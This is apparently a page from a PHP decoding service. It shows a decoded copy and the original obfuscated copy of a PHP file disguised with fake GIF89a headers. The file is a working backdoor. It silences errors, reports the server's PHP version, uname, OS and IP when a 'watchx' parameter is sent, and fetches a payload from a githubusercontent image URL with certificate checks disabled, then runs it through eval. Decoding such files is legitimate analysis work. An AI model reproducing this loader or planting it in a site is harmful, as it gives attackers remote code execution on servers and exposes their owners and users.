Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<!-- GIF89;a --> <!-- GIF89;a --> <!-- GIF89;a --> <?php goto TSEbL; TSEbL: $GLOBALS[..
Decoded Output download
<!-- GIF89;a -->
<!-- GIF89;a -->
<!-- GIF89;a -->
<?php
goto TSEbL; TSEbL: $GLOBALS["lnrkdexmo"] = "result"; goto bp8sj; IC5d_: $GLOBALS["nqusfcueqf"] = "version"; goto OG0QL; n8Yl6: $GLOBALS["ltnbuthggrc"] = "a"; goto P9cBL; w5FMD: function get_contents($url) { $wyeeuqehxtz = "ch"; ${$GLOBALS["kmnpcocuqa"]} = curl_init("{$url}"); curl_setopt(${$GLOBALS["kmnpcocuqa"]}, CURLOPT_RETURNTRANSFER, 1); $GLOBALS["oxuwprq"] = "ch"; curl_setopt(${$GLOBALS["kmnpcocuqa"]}, CURLOPT_FOLLOWLOCATION, 1); curl_setopt(${$wyeeuqehxtz}, CURLOPT_USERAGENT, "Mozilla/5.0(Windows NT 6.1; 32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt(${$GLOBALS["kmnpcocuqa"]}, CURLOPT_SSL_VERIFYHOST, 0); $GLOBALS["cbtslil"] = "ch"; curl_setopt(${$GLOBALS["kmnpcocuqa"]}, CURLOPT_COOKIEJAR, $GLOBALS["coki"]); curl_setopt(${$GLOBALS["kmnpcocuqa"]}, CURLOPT_COOKIEFILE, $GLOBALS["coki"]); ${$GLOBALS["lnrkdexmo"]} = curl_exec($ch); return ${$GLOBALS["lnrkdexmo"]}; } goto tt5hd; lVCjK: $GLOBALS["kmnpcocuqa"] = "ch"; goto IC5d_; bp8sj: $GLOBALS["fcgthfemb"] = "a"; goto lVCjK; O8Uk2: if ($_REQUEST["watchx"]) { $wfmjlpuc = "ip"; $GLOBALS["kumviinoca"] = "version"; $twcfypprtyn = "uname"; $version = phpversion(); $GLOBALS["tvefrhpr"] = "uname"; $uname = php_uname(); $ip = gethostbyname($_SERVER["HTTP_HOST"]); echo json_encode(array("version" => $version, "uname" => $uname, "platform" => PHP_OS, "ip" => $ip, "workingx" => true)); die; } goto w5FMD; OG0QL: $GLOBALS["mluhaqb"] = "ip"; goto n8Yl6; X_iat: ini_set("display_errors", 0); goto O8Uk2; P9cBL: error_reporting(0); goto X_iat; tt5hd: ${$GLOBALS["ltnbuthggrc"]} = get_contents("https://user-images.githubusercontent.com/117648087/209456963-19a93e62-3130-447a-996e-e9dd1e657555.jpg"); goto Jxq2C; Jxq2C: eval("?>" . ${$GLOBALS["fcgthfemb"]}); ?>Did this file decode correctly?
Original Code
<!-- GIF89;a -->
<!-- GIF89;a -->
<!-- GIF89;a -->
<?php
goto TSEbL; TSEbL: $GLOBALS["\154\x6e\162\x6b\144\x65\x78\155\157"] = "\162\145\163\165\154\164"; goto bp8sj; IC5d_: $GLOBALS["\156\x71\x75\163\x66\x63\165\x65\161\x66"] = "\166\x65\x72\x73\151\x6f\156"; goto OG0QL; n8Yl6: $GLOBALS["\x6c\x74\x6e\142\x75\164\x68\x67\x67\x72\x63"] = "\x61"; goto P9cBL; w5FMD: function get_contents($url) { $wyeeuqehxtz = "\143\150"; ${$GLOBALS["\x6b\x6d\156\x70\x63\157\x63\165\161\x61"]} = curl_init("{$url}"); curl_setopt(${$GLOBALS["\x6b\155\x6e\160\143\x6f\x63\x75\161\141"]}, CURLOPT_RETURNTRANSFER, 1); $GLOBALS["\x6f\x78\165\167\x70\162\x71"] = "\143\150"; curl_setopt(${$GLOBALS["\x6b\x6d\x6e\x70\143\x6f\x63\x75\161\141"]}, CURLOPT_FOLLOWLOCATION, 1); curl_setopt(${$wyeeuqehxtz}, CURLOPT_USERAGENT, "\x4d\157\x7a\151\x6c\154\x61\x2f\65\56\x30\x28\127\x69\156\x64\157\167\163\x20\x4e\124\x20\66\x2e\61\73\x20\63\62\x2e\x30\51\x20\x47\145\143\153\157\x2f\62\x30\61\x30\x30\x31\60\x31\x20\x46\151\x72\x65\x66\x6f\x78\57\x33\x32\56\60"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt(${$GLOBALS["\x6b\x6d\x6e\x70\143\157\x63\x75\x71\x61"]}, CURLOPT_SSL_VERIFYHOST, 0); $GLOBALS["\x63\x62\164\x73\154\x69\154"] = "\x63\x68"; curl_setopt(${$GLOBALS["\x6b\155\156\160\x63\157\x63\165\161\x61"]}, CURLOPT_COOKIEJAR, $GLOBALS["\x63\x6f\x6b\151"]); curl_setopt(${$GLOBALS["\153\x6d\156\160\143\157\x63\x75\161\141"]}, CURLOPT_COOKIEFILE, $GLOBALS["\143\x6f\153\151"]); ${$GLOBALS["\154\156\162\x6b\144\145\170\x6d\157"]} = curl_exec($ch); return ${$GLOBALS["\x6c\156\162\x6b\144\145\x78\155\157"]}; } goto tt5hd; lVCjK: $GLOBALS["\x6b\155\156\160\143\157\143\165\161\141"] = "\x63\150"; goto IC5d_; bp8sj: $GLOBALS["\x66\x63\147\x74\150\146\x65\x6d\142"] = "\x61"; goto lVCjK; O8Uk2: if ($_REQUEST["\x77\x61\x74\x63\x68\170"]) { $wfmjlpuc = "\x69\160"; $GLOBALS["\x6b\165\155\166\151\151\x6e\x6f\143\x61"] = "\166\145\162\163\151\157\156"; $twcfypprtyn = "\x75\x6e\141\x6d\145"; $version = phpversion(); $GLOBALS["\164\166\x65\146\162\x68\x70\x72"] = "\x75\x6e\141\x6d\x65"; $uname = php_uname(); $ip = gethostbyname($_SERVER["\110\x54\x54\x50\x5f\x48\x4f\123\x54"]); echo json_encode(array("\x76\145\162\163\x69\157\156" => $version, "\x75\156\141\x6d\x65" => $uname, "\x70\x6c\141\164\x66\157\x72\155" => PHP_OS, "\x69\x70" => $ip, "\167\157\x72\x6b\151\156\x67\170" => true)); die; } goto w5FMD; OG0QL: $GLOBALS["\155\x6c\x75\x68\x61\161\142"] = "\151\160"; goto n8Yl6; X_iat: ini_set("\x64\x69\163\x70\154\x61\x79\x5f\x65\x72\x72\157\162\x73", 0); goto O8Uk2; P9cBL: error_reporting(0); goto X_iat; tt5hd: ${$GLOBALS["\x6c\164\x6e\x62\165\x74\x68\147\x67\x72\x63"]} = get_contents("\x68\x74\x74\x70\163\72\x2f\x2f\165\x73\145\x72\55\x69\155\x61\147\x65\163\x2e\x67\151\164\x68\x75\x62\165\163\145\162\x63\157\156\164\x65\x6e\x74\56\143\157\x6d\x2f\x31\x31\x37\66\64\x38\x30\x38\x37\57\x32\60\71\64\x35\66\x39\66\x33\55\61\71\x61\71\63\x65\66\x32\x2d\x33\x31\x33\60\x2d\64\64\67\141\55\71\x39\x36\x65\x2d\145\71\144\144\x31\x65\66\65\67\x35\65\x35\56\x6a\x70\x67"); goto Jxq2C; Jxq2C: eval("\x3f\76" . ${$GLOBALS["\x66\143\147\x74\x68\x66\x65\155\142"]});Function Calls
| None |
Stats
| MD5 | c8e45ae34f94c874078d0cae65284129 |
| Eval Count | 0 |
| Decode Time | 35 ms |